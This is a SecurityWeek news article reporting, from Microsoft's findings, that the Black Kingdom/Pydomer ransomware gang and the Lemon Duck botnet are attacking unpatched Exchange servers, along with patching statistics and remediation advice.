Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

More Ransomware Gangs Targeting Vulnerable Exchange Servers

The Black Kingdom/Pydomer ransomware operators have joined the ranks of threat actors targeting the Exchange Server vulnerabilities that Microsoft disclosed in early March.

The Black Kingdom/Pydomer ransomware operators have joined the ranks of threat actors targeting the Exchange Server vulnerabilities that Microsoft disclosed in early March.

The zero-day bugs, four in total, had been targeted in live attacks well before patches were released for them on March 2, with exponentially more adversaries picking them up over the past three weeks, despite the availability of additional mitigations.

The number of unpatched Exchange installations has dropped significantly, going from roughly 80,000 on March 14 to fewer than 30,000 on March 22.

“As of today, we have seen a significant decrease in the number of still-vulnerable servers – more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities,” Microsoft noted in a March 25 blog post.

The number of attacks targeting the still-vulnerable servers, however, hasn’t diminished. In fact, the tech company reveals that additional ransomware families and botnets are now attempting to compromise the vulnerable servers.

DoejoCrypt, also known as DearCry, was the first ransomware family to target the Exchange vulnerabilities, more than two weeks ago. The Black Kingdom/Pydomer ransomware has since joined the fray, Microsoft says.

Known to be targeting publicly disclosed vulnerabilities, including Pulse Secure VPN flaws, Pydomer operators were observed mass scanning for and attempting to compromise unpatched Exchange servers.

“They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available,” the tech giant reveals.

Advertisement. Scroll to continue reading.

The webshell dropped by the gang was observed on approximately 1,500 servers, but ransomware wasn’t deployed on all of them. However, it’s likely that the adversaries would attempt to monetize the obtained unauthorized access in a different manner, Microsoft says.

On systems where the ransomware was deployed, however, a “non-encryption extortion strategy” was adopted, with the attackers only dropping a ransom note to inform victims on their demands.

“The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data,” the tech company points out.

Within the past few weeks, another adversary to have joined the Exchange party was the gang behind the Lemon Duck cryptocurrency botnet, which employed “a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks,” but relied on various exploit styles in others.

“While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner,” Microsoft explains.

The company also underlines that attacks targeting Exchange servers may continue to impact organizations even after patches have been applied, through the use of stolen credentials, or persistent access.

“Attackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates,” Microsoft concludes.

Related: Microsoft Defender Antivirus Now Protects Users Against Ongoing Exchange Attacks

Related: Microsoft Shares Additional Mitigations for Exchange Server Vulnerabilities Under Attack

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this event as we dive into threat hunting tools and frameworks, and explore value of threat intelligence data in the defender’s security stack.

Register

Learn how integrating BAS and Automated Penetration Testing empowers security teams to quickly identify and validate threats, enabling prompt response and remediation.

Register

People on the Move

Edge Delta has appointed Joan Pepin as its Chief Information Security Officer.

Vats Srivatsan has been appointed interim CEO of WatchGuard after Prakash Panjwani stepped down.

Network security policy management firm FireMon has appointed Alex Bender as Chief Marketing Officer.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.